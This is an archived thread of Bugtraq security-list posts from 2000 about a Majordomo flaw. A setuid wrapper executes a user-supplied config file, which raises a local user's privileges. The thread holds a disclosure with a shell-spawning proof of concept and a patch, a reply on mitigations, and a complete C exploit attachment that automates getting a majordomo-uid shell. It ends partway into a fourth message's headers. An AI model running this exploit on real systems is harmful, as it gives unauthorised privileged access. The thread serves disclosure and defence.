5140231 2000-05-28 20:27 /276 rader/ Postmaster
Mottagare: Bugtraq (import) <11035>
Ärende: more majordomo brokeness
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <392AE52C.8512B2CB@core-sdi.com>
Date: Tue, 23 May 2000 18:48:25 -0300
Reply-To: "Federico G. Schwindt" <core.lists.bugtraq@CORE-SDI.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Federico G. Schwindt" <core.lists.bugtraq@CORE-SDI.COM>
Organization: Core SDI S.A.
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
Majordomo is a perl script for managing mailing lists. The package
comes with several scripts and a program written in C (wrapper) that
runs setuid to ensure that majordomo performs all the work with proper
permissions (for further information you can check the FAQ that comes
with the package under Doc/ or in
http://www.visi.com/~barr/majordomo-faq.html).
This wrapper is installed by default as root, mode 4755 and group as
the one used for majordomo. What this means? If you can fool majordomo
to run arbitrary commands, they'll be run with uid and gid equal to the
one used for majordomo.
Almost all of these scripts accept an optional configuration from the
command line, which is loaded and evaluated via perl's require keyword.
This file is nothing else than perl code, thus creating a special file
with our commands and pointing it as the configuration of any of the
affected scripts will result in the following (this applies to majordomo
1.94.5):
$ cat /tmp/myconf
system("/bin/sh");
$ id
uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
$ ./wrapper bounce-remind -C /tmp/myconf
$ id
uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)
This is not new. The same problem has been seen in the past in the
majordomo script shipped with the previous version, 1.94.4 (for more
details, http://www.securityfocus.com/bid/903).
Interesting enough, this occurs on several scripts: archive2.pl,
bounce-remind, config-test, digest, majordomo, request-answer and
resend; medit under bin/, and archive_mh.pl, new-list, and sequencer
under Tools/ uses 'require' in the same way, but since the wrapper only
executes those scripts found in the majordomo installation directory,
they cannot be exploited.
The obvious fix is to remove this option from all the involved
scripts, but since it can be useful on large sites with several mailing
lists, we've choosen instead to only allow configuration files from a
trusted directory, removing the problem without loosing functionality.
Diffs:
--- majordomo-1.94.5/Makefile.orig Tue Jan 18 11:01:17 2000
+++ majordomo-1.94.5/Makefile Tue May 23 07:05:24 2000
@@ -63,7 +63,8 @@
# passed to processes run by "wrapper"
W_SHELL = /bin/sh
W_PATH = /bin:/usr/bin:/usr/ucb
-W_MAJORDOMO_CF = $(W_HOME)/majordomo.cf
+W_MAJORDOMO_CF = majordomo.cf
+W_MAJORDOMO_CFDIR = $(W_HOME)/config
# A directory for temp files..
TMPDIR = /usr/tmp
@@ -77,7 +78,8 @@
WRAPPER_FLAGS = -DBIN=\"$(W_HOME)\" -DPATH=\"PATH=$(W_PATH)\" \
-DHOME=\"HOME=$(W_HOME)\" -DSHELL=\"SHELL=$(W_SHELL)\" \
- -DMAJORDOMO_CF=\"MAJORDOMO_CF=$(W_MAJORDOMO_CF)\" \
+ -DMAJORDOMO_CF=\"MAJORDOMO_CF=$(W_MAJORDOMO_CFDIR)/$(W_MAJORDOMO_CF)\"
\
+ -DMAJORDOMO_CFDIR=\"MAJORDOMO_CFDIR=$(W_MAJORDOMO_CFDIR)\" \
$(POSIX)
INSTALL = ./install.sh
--- majordomo-1.94.5/archive2.pl.orig Fri Jan 7 08:00:49 2000
+++ majordomo-1.94.5/archive2.pl Tue May 23 07:47:09 2000
@@ -50,7 +50,7 @@
# Read and execute the .cf file
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/contrib/archive_mh.pl.orig Mon Mar 10 12:40:41 1997
+++ majordomo-1.94.5/contrib/archive_mh.pl Tue May 23 07:50:23 2000
@@ -17,9 +17,9 @@
$ENV{'PATH'} = "/bin:/usr/bin:/usr/ucb";
# Read and execute the .cf file
-$cf = $ENV{"MAJORDOMO_CF"} || "/tools/majordomo-1.56/majordomo.cf";
+$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/bounce-remind.orig Mon Dec 9 13:49:46 1996
+++ majordomo-1.94.5/bounce-remind Tue May 23 07:47:27 2000
@@ -20,7 +20,7 @@
# Read and execute the .cf file
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]";
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/config-test.orig Wed Aug 27 12:17:13 1997
+++ majordomo-1.94.5/config-test Tue May 23 16:10:05 2000
@@ -117,6 +117,8 @@
print "\n\tNon obvious things that cause headaches:\n\n";
&header('');
+$ARGV[0] = ($ARGV[0] && $ARGV[0] !~ /\//) ?
+ "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[0]" : '';
$cf = $ARGV[0] || $ENV{'MAJORDOMO_CF'};
if (eval "require '$cf'") {
--- majordomo-1.94.5/digest.orig Fri Jan 7 08:04:34 2000
+++ majordomo-1.94.5/digest Tue May 23 16:02:49 2000
@@ -322,6 +322,8 @@
&abort("-C used without -l");
} else {
# Read and execute the .cf file
+ $opt_c = ($opt_c && $opt_c !~ /\//) ?
+ "$ENV{'MAJORDOMO_CFDIR'}/$opt_c" : '';
$cf = $opt_c || $ENV{"MAJORDOMO_CF"} ||
"/etc/majordomo.cf";
require "$cf";
--- majordomo-1.94.5/majordomo.orig Thu Jan 13 14:29:31 2000
+++ majordomo-1.94.5/majordomo Tue May 23 07:48:42 2000
@@ -29,7 +29,7 @@
while ($ARGV[0]) { # parse for config file or default list
if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~
/\//;
shift(@ARGV);
shift(@ARGV);
} elsif ($ARGV[0] eq "-l") {
--- majordomo-1.94.5/medit.orig Mon Apr 28 15:38:05 1997
+++ majordomo-1.94.5/medit Tue May 23 07:48:55 2000
@@ -19,7 +19,7 @@
# Read and execute the .cf file
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/contrib/new-list.orig Mon Dec 9 13:50:45 1996
+++ majordomo-1.94.5/contrib/new-list Tue May 23 07:50:41 2000
@@ -15,7 +15,7 @@
# Read and execute the .cf file
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/request-answer.orig Fri Jan 7 08:10:18 2000
+++ majordomo-1.94.5/request-answer Tue May 23 07:49:10 2000
@@ -16,7 +16,7 @@
# Read and execute the .cf file
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/resend.orig Fri Jan 7 12:32:39 2000
+++ majordomo-1.94.5/resend Tue May 23 16:02:37 2000
@@ -79,6 +79,9 @@
}
# Read and execute the .cf file
+$cfdir = $ENV{"MAJORDOMO_CFDIR"};
+$opt_C = ($opt_C && $opt_C !~ /\//) ? "$cfdir/$opt_C" : '';
+$opt_c = ($opt_c && $opt_c !~ /\//) ? "$cfdir/$opt_c" : '';
$cf = $opt_C || $opt_c || $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
# Despite not having a place to send the remains of the body,
--- majordomo-1.94.5/contrib/sequencer.orig Mon Dec 9 13:50:48 1996
+++ majordomo-1.94.5/contrib/sequencer Tue May 23 07:50:58 2000
@@ -48,7 +48,7 @@
# Read and execute the .cf file
$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
if ($ARGV[0] eq "-C") {
- $cf = $ARGV[1];
+ $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
shift(@ARGV);
shift(@ARGV);
}
--- majordomo-1.94.5/wrapper.c.orig Wed Aug 27 12:01:12 1997
+++ majordomo-1.94.5/wrapper.c Tue May 23 07:06:23 2000
@@ -42,20 +42,27 @@
# define SHELL "SHELL=/bin/sh"
#endif
+#ifndef MAJORDOMO_CF
+# error "MAJORDOMO_CF not defined; edit Makefile"
+#endif
+
+#ifndef MAJORDOMO_CFDIR
+# error "MAJORDOMO_CFDIR not defined; edit Makefile"
+#endif
+
char * new_env[] = {
HOME, /* 0 */
PATH, /* 1 */
SHELL, /* 2 */
-#ifdef MAJORDOMO_CF
MAJORDOMO_CF, /* 3 */
-#endif
+ MAJORDOMO_CFDIR, /* 4 */
0, /* possibly for USER or LOGNAME */
0, /* possible for LOGNAME */
0, /* possibly for timezone */
0
};
-int new_env_size = 7; /* to prevent overflow problems */
+int new_env_size = 8; /* to prevent overflow problems */
main(argc, argv, env)
int argc;
@@ -89,11 +96,7 @@
* if they exist.
*/
-#ifdef MAJORDOMO_CF
- e = 4; /* the first unused slot in new_env[] */
-#else
- e = 3; /* the first unused slot in new_env[] */
-#endif
+ e = 5; /* the first unused slot in new_env[] */
for (i = 0 ; env[i] != NULL && e <= new_env_size; i++) {
if ((strncmp(env[i], "USER=", 5) == 0) ||
@@ -153,5 +156,6 @@
fprintf(stderr, " PATH is %s,\n", PATH);
fprintf(stderr, " SHELL is %s,\n", SHELL);
fprintf(stderr, " MAJORDOMO_CF is %s\n", MAJORDOMO_CF);
+ fprintf(stderr, " MAJORDOMO_CFDIR is %s\n", MAJORDOMO_CFDIR);
exit(EX_OSERR);
}
MAJORDOMO_CFDIR points to the trusted directory. You should store all
the configuration files there. Be sure that is pointing to the correct
place or majordomo won't work.
We've also modified wrapper.c to barf if neither MAJORDOMO_CF nor
MAJORDOMO_CFDIR are defined, since there is no point in using it
otherwise, plus a few other minor paranoia changes... ;)
Salute,
f.-
--
Federico Schwindt - Developer fgsch@core-sdi.com
Core SDI S.A. http://www.core-sdi.com
--- For a personal reply use fgsch@core-sdi.com
(5140231) -----------------------------------
5151983 2000-06-01 07:51 /305 rader/ Postmaster
Mottagare: Bugtraq (import) <11070>
Ärende: Re: more majordomo brokeness
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-ID: <71D105274EA7D011905700805FFECA5906B8EF9D@xch-sea-10.ca.boeing.com>
Date: Tue, 30 May 2000 07:49:52 -0700
Reply-To: "Skahan, Vince" <Vince.Skahan@PSS.BOEING.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Skahan, Vince" <Vince.Skahan@PSS.BOEING.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM, "Federico G. Schwindt"
<core.lists.bugtraq@CORE-SDI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This came up in January. It's also well documented in the majordomo
FAQ: http://www.greatcircle.com/majordomo/majordomo-faq.html#wrapsec
It is easily possible to remove 'all' interactive access to all the
pieces of the majordomo software, even if you are using smrsh,
without modifying the majordomo software itself.
* set the group id in majordomo's makefile to group 'mail'
(assuming you're the same as RedHat and mail is delivered
as mail.mail on your o/s - check it with a script that runs 'id')
* remove world r-x on majordomo's home dir and its contents
* remove world r-x on the list dir and its contents
* still have the symbolic link to wrapper for smrsh to work if you
have that installed with your sendmail
Tested with majordomo 1.94-5 on RH-6.1 (sendmail8.9.3+smrsh)
--
-------- Vince.Skahan@boeing.com ------ http://bcstec.ca.boeing.com/~vds/ -------------
Boeing Shared Services Group - Technical Services
outside Boeing - http://www.halcyon.com/vince
> ----------
> From: Federico G. Schwindt[SMTP:core.lists.bugtraq@CORE-SDI.COM]
> Reply To: Federico G. Schwindt
> Sent: Tuesday, May 23, 2000 2:48 PM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: more majordomo brokeness
>
> Hi,
>
> Majordomo is a perl script for managing mailing lists. The package
> comes with several scripts and a program written in C (wrapper) that
> runs setuid to ensure that majordomo performs all the work with proper
> permissions (for further information you can check the FAQ that comes
> with the package under Doc/ or in
> http://www.visi.com/~barr/majordomo-faq.html).
> This wrapper is installed by default as root, mode 4755 and group as
> the one used for majordomo. What this means? If you can fool majordomo
> to run arbitrary commands, they'll be run with uid and gid equal to the
> one used for majordomo.
> Almost all of these scripts accept an optional configuration from the
> command line, which is loaded and evaluated via perl's require keyword.
> This file is nothing else than perl code, thus creating a special file
> with our commands and pointing it as the configuration of any of the
> affected scripts will result in the following (this applies to majordomo
> 1.94.5):
>
> $ cat /tmp/myconf
> system("/bin/sh");
> $ id
> uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
> $ ./wrapper bounce-remind -C /tmp/myconf
> $ id
> uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)
>
> This is not new. The same problem has been seen in the past in the
> majordomo script shipped with the previous version, 1.94.4 (for more
> details, http://www.securityfocus.com/bid/903).
> Interesting enough, this occurs on several scripts: archive2.pl,
> bounce-remind, config-test, digest, majordomo, request-answer and
> resend; medit under bin/, and archive_mh.pl, new-list, and sequencer
> under Tools/ uses 'require' in the same way, but since the wrapper only
> executes those scripts found in the majordomo installation directory,
> they cannot be exploited.
> The obvious fix is to remove this option from all the involved
> scripts, but since it can be useful on large sites with several mailing
> lists, we've choosen instead to only allow configuration files from a
> trusted directory, removing the problem without loosing functionality.
> Diffs:
>
> --- majordomo-1.94.5/Makefile.orig Tue Jan 18 11:01:17 2000
> +++ majordomo-1.94.5/Makefile Tue May 23 07:05:24 2000
> @@ -63,7 +63,8 @@
> # passed to processes run by "wrapper"
> W_SHELL = /bin/sh
> W_PATH = /bin:/usr/bin:/usr/ucb
> -W_MAJORDOMO_CF = $(W_HOME)/majordomo.cf
> +W_MAJORDOMO_CF = majordomo.cf
> +W_MAJORDOMO_CFDIR = $(W_HOME)/config
>
> # A directory for temp files..
> TMPDIR = /usr/tmp
> @@ -77,7 +78,8 @@
>
> WRAPPER_FLAGS = -DBIN=\"$(W_HOME)\" -DPATH=\"PATH=$(W_PATH)\" > \
> -DHOME=\"HOME=$(W_HOME)\" -DSHELL=\"SHELL=$(W_SHELL)\" \
> - -DMAJORDOMO_CF=\"MAJORDOMO_CF=$(W_MAJORDOMO_CF)\" \
> + -DMAJORDOMO_CF=\"MAJORDOMO_CF=$(W_MAJORDOMO_CFDIR)/$(W_MAJORDOMO_CF)\"
> \
> + -DMAJORDOMO_CFDIR=\"MAJORDOMO_CFDIR=$(W_MAJORDOMO_CFDIR)\" \
> $(POSIX)
>
> INSTALL = ./install.sh
> --- majordomo-1.94.5/archive2.pl.orig Fri Jan 7 08:00:49 2000
> +++ majordomo-1.94.5/archive2.pl Tue May 23 07:47:09 2000
> @@ -50,7 +50,7 @@
> # Read and execute the .cf file
> $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/contrib/archive_mh.pl.orig Mon Mar 10 12:40:41 1997
> +++ majordomo-1.94.5/contrib/archive_mh.pl Tue May 23 07:50:23 2000
> @@ -17,9 +17,9 @@
> $ENV{'PATH'} = "/bin:/usr/bin:/usr/ucb";
>
> # Read and execute the .cf file
> -$cf = $ENV{"MAJORDOMO_CF"} || "/tools/majordomo-1.56/majordomo.cf";
> +$cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/bounce-remind.orig Mon Dec 9 13:49:46 1996
> +++ majordomo-1.94.5/bounce-remind Tue May 23 07:47:27 2000
> @@ -20,7 +20,7 @@
> # Read and execute the .cf file
> $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]";
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/config-test.orig Wed Aug 27 12:17:13 1997
> +++ majordomo-1.94.5/config-test Tue May 23 16:10:05 2000
> @@ -117,6 +117,8 @@
> print "\n\tNon obvious things that cause headaches:\n\n";
> &header('');
>
> +$ARGV[0] = ($ARGV[0] && $ARGV[0] !~ /\//) ?
> + "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[0]" : '';
> $cf = $ARGV[0] || $ENV{'MAJORDOMO_CF'};
>
> if (eval "require '$cf'") {
> --- majordomo-1.94.5/digest.orig Fri Jan 7 08:04:34 2000
> +++ majordomo-1.94.5/digest Tue May 23 16:02:49 2000
> @@ -322,6 +322,8 @@
> &abort("-C used without -l");
> } else {
> # Read and execute the .cf file
> + $opt_c = ($opt_c && $opt_c !~ /\//) ?
> + "$ENV{'MAJORDOMO_CFDIR'}/$opt_c" : '';
> $cf = $opt_c || $ENV{"MAJORDOMO_CF"} ||
> "/etc/majordomo.cf";
> require "$cf";
> --- majordomo-1.94.5/majordomo.orig Thu Jan 13 14:29:31 2000
> +++ majordomo-1.94.5/majordomo Tue May 23 07:48:42 2000
> @@ -29,7 +29,7 @@
>
> while ($ARGV[0]) { # parse for config file or default list
> if ($ARGV[0] =~ /^-C$/i) { # sendmail v8 clobbers case
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~
> /\//;
> shift(@ARGV);
> shift(@ARGV);
> } elsif ($ARGV[0] eq "-l") {
> --- majordomo-1.94.5/medit.orig Mon Apr 28 15:38:05 1997
> +++ majordomo-1.94.5/medit Tue May 23 07:48:55 2000
> @@ -19,7 +19,7 @@
> # Read and execute the .cf file
> $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/contrib/new-list.orig Mon Dec 9 13:50:45 1996
> +++ majordomo-1.94.5/contrib/new-list Tue May 23 07:50:41 2000
> @@ -15,7 +15,7 @@
> # Read and execute the .cf file
> $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/request-answer.orig Fri Jan 7 08:10:18 2000
> +++ majordomo-1.94.5/request-answer Tue May 23 07:49:10 2000
> @@ -16,7 +16,7 @@
> # Read and execute the .cf file
> $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";>
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/resend.orig Fri Jan 7 12:32:39 2000
> +++ majordomo-1.94.5/resend Tue May 23 16:02:37 2000
> @@ -79,6 +79,9 @@
> }
>
> # Read and execute the .cf file
> +$cfdir = $ENV{"MAJORDOMO_CFDIR"};
> +$opt_C = ($opt_C && $opt_C !~ /\//) ? "$cfdir/$opt_C" : '';
> +$opt_c = ($opt_c && $opt_c !~ /\//) ? "$cfdir/$opt_c" : '';
> $cf = $opt_C || $opt_c || $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
>
> # Despite not having a place to send the remains of the body,
> --- majordomo-1.94.5/contrib/sequencer.orig Mon Dec 9 13:50:48 1996
> +++ majordomo-1.94.5/contrib/sequencer Tue May 23 07:50:58 2000
> @@ -48,7 +48,7 @@
> # Read and execute the .cf file
> $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";
> if ($ARGV[0] eq "-C") {
> - $cf = $ARGV[1];
> + $cf = "$ENV{'MAJORDOMO_CFDIR'}/$ARGV[1]" unless $ARGV[1] =~ /\//;
> shift(@ARGV);
> shift(@ARGV);
> }
> --- majordomo-1.94.5/wrapper.c.orig Wed Aug 27 12:01:12 1997
> +++ majordomo-1.94.5/wrapper.c Tue May 23 07:06:23 2000
> @@ -42,20 +42,27 @@
> # define SHELL "SHELL=/bin/sh"
> #endif
>
> +#ifndef MAJORDOMO_CF
> +# error "MAJORDOMO_CF not defined; edit Makefile"
> +#endif
> +
> +#ifndef MAJORDOMO_CFDIR
> +# error "MAJORDOMO_CFDIR not defined; edit Makefile"
> +#endif
> +
> char * new_env[] = {
> HOME, /* 0 */
> PATH, /* 1 */
> SHELL, /* 2 */
> -#ifdef MAJORDOMO_CF
> MAJORDOMO_CF, /* 3 */
> -#endif
> + MAJORDOMO_CFDIR, /* 4 */
> 0, /* possibly for USER or LOGNAME */
> 0, /* possible for LOGNAME */
> 0, /* possibly for timezone */
> 0
> };
>
> -int new_env_size = 7; /* to prevent overflow problems */
> +int new_env_size = 8; /* to prevent overflow problems */
>
> main(argc, argv, env)
> int argc;
> @@ -89,11 +96,7 @@
> * if they exist.
> */
>
> -#ifdef MAJORDOMO_CF
> - e = 4; /* the first unused slot in new_env[] */
> -#else
> - e = 3; /* the first unused slot in new_env[] */
> -#endif
> + e = 5; /* the first unused slot in new_env[] */
>
> for (i = 0 ; env[i] != NULL && e <= new_env_size; i++) {
> if ((strncmp(env[i], "USER=", 5) == 0) ||
> @@ -153,5 +156,6 @@
> fprintf(stderr, " PATH is %s,\n", PATH);
> fprintf(stderr, " SHELL is %s,\n", SHELL);
> fprintf(stderr, " MAJORDOMO_CF is %s\n", MAJORDOMO_CF);
> + fprintf(stderr, " MAJORDOMO_CFDIR is %s\n", MAJORDOMO_CFDIR);
> exit(EX_OSERR);
> }
>
> MAJORDOMO_CFDIR points to the trusted directory. You should store all
> the configuration files there. Be sure that is pointing to the correct
> place or majordomo won't work.
> We've also modified wrapper.c to barf if neither MAJORDOMO_CF nor
> MAJORDOMO_CFDIR are defined, since there is no point in using it
> otherwise, plus a few other minor paranoia changes... ;)
> Salute,
>
> f.-
>
> --
> Federico Schwindt - Developer fgsch@core-sdi.com
> Core SDI S.A. http://www.core-sdi.com
>
> --- For a personal reply use fgsch@core-sdi.com
>
(5151983) ------------------------------------------(Ombruten)
5154044 2000-06-02 03:24 /171 rader/ Postmaster
Mottagare: Bugtraq (import) <11110>
Ärende: more majordomo brokeness - "exploit"
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: multipart/mixed
boundary="----=_NextPart_000_001D_01BFCBC9.D3DB68A0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4132.2800
Importance: Normal
Message-ID: <LPBBINOIAGJKJFMHHGGMOECNCBAA.morpheusbd@gmx.net>
Date: Thu, 1 Jun 2000 13:03:49 +0200
Reply-To: Morpheus <morpheusbd@GMX.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Morpheus <morpheusbd@GMX.NET>
X-To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_001D_01BFCBC9.D3DB68A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Just a quick 'n dirty "exploit" for the Majordomo-prob.
Probably usefull to Admins who want to check (automatically)
their system with one small script ...
It's possible to adapt this program easily - if you need to.
Unfortunately I have no time to write an English version
but I think the language is unimportant for the exploitation ...
regards,
Morpheus
------=_NextPart_000_001D_01BFCBC9.D3DB68A0
Content-Type: application/octet-stream;
name="MAJOR2.C"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="MAJOR2.C"
/*
MAJORDOMO - EXPLOIT F=DCR LINUX
getestet bis v1.94.5
programmiert von Morpheus
=20
Der Exploit basiert auf der fehlerhaften Nutzung von Majordomo-
Skripten. Standardm=E4=DFig wird vom Exploit das =
"bounce-remind"-Skript
verwandt. Bei Erfolg liefert der Exploit eine Shell mit einer uid
und gid dem Majordomo Wrapper entsprechend gesetzt.
Getestet wurde der Exploit auf SuSE Linux 6.0 / 6.3 (CeBIT-Version). =
=20
Zur Kompilierung des Exploits:
=20
gcc major.c -o major =20
=20
Zur Nutzung des Exploits:
=20
Wenn der Exploit <major> hei=DFt dann einfach ./major eingeben. Es
sollte gen=FCgen. Wenn dann keine Shell gestartet wird, bitte die
Fehlermeldungen beachten. Entweder ist die Majordomo-Version nicht
"kompatibel" oder das Majordomo-Skript ist nicht vorhanden. Dann
sollte man entweder ./major auto eingeben, so dass der Exploit
alle verwundbaren Skripts ausprobiert, oder man gibt ./major =
<skript>
ein, wobei <skript> durch ein verwundbares Majordomo-Skript zu =
ersetzen
ist. Um die Hilfe-=DCbersicht zu bekommen, einfach ./major -h =
eingeben.
=20
Programmiert von Morpheus [BrightDarkness] '00
URL: www.brightdarkness.de
Mail: morpheusbd@gmx.net
=20
Dieser Bug in Majordomo wurde nicht von mir entdeckt. Ich habe nur
zu diesem Bug den entsprechenden Exploit programmiert.
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define MAJORDOMO "/usr/lib/majordomo/wrapper"
#define SHELL "system(\"/bin/sh\")"
#define MORPHEUS "/tmp/morpheus"
#define WRAPPER "wrapper"
void intro(void);
void usage(char *arg);
int main(int argc, char **argv)
{
char skript[30];
char *skripte[40];
int i =3D 0; =20
int file;
skripte[1] =3D "bounce-remind";
skripte[2] =3D "archive2.pl";
skripte[3] =3D "config-test";
skripte[4] =3D "digest";
skripte[5] =3D "majordomo";
skripte[6] =3D "request-answer";
skripte[7] =3D "resend";
=20
if ((argc =3D=3D 2) && (strcmp(argv[1], "-h") =3D=3D 0))
usage(argv[0]);
=20
if (argc =3D=3D 2)
strncpy(skript,argv[1], strlen(skript));
else
strcpy(skript, "bounce-remind");
=20
if ((file =3D open(MORPHEUS, O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0)
{
perror(MORPHEUS);
exit(1);
}
write(file, SHELL, strlen(SHELL));
close(file);
intro();
if (strncmp(skript, "auto") =3D=3D 0)
{
for (i =3D 1; i <=3D 7; i++)
{
printf("using : %s\n", skripte[i]);
if (execl(MAJORDOMO, WRAPPER, skripte[i], "-C", MORPHEUS, 0) =
=3D=3D -1) perror("EXECL");
}
}
else
{
printf("using : %s\n", skript);
if (execl(MAJORDOMO, WRAPPER, skript, "-C", MORPHEUS, 0)
=3D=3D =
-1) perror("EXECL"); =20
} =20
return 0;
}
void intro(void)
{
printf("\033[2J\033[1;1H");
printf("\033[1;33mExploit-Code f=FCr Majordomo Wrapper <=3D =
v1.94.5\n");
printf("\033[1;32mProgrammiert von Morpheus [BrightDarkness] =
'00\n");
printf("\033[1;31mURL: \033[1;32mwww.brightdarkness.de\n");
printf("\033[1;31mmail: \033[1;32mmorpheusbd@gmx.net\n");
printf("\033[0;29m");
}
void usage(char *arg)
{
intro();
printf("\033[1;34m");
printf("Hilfe f=FCr dieses Programm :\n");
printf("Benutzung : %s -h Help screen\n", arg);
printf(" %s auto Trying all scripts =
automatically\n", arg);
printf(" %s <skriptname> Tries just this <script>\n", =
arg);
printf("\033[0;29m");
exit(0);
}
------=_NextPart_000_001D_01BFCBC9.D3DB68A0--
(5154044) ------------------------------------------(Ombruten)
5158336 2000-06-04 04:18 /59 rader/ Postmaster
Mottagare: Bugtraq (import) <11140>
Ärende: [Debian] Majordomo will be removed
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID: <20000603150754.G22383@underground.org>
Date: Sat, 3 Jun 2000 15:07:54 -0700
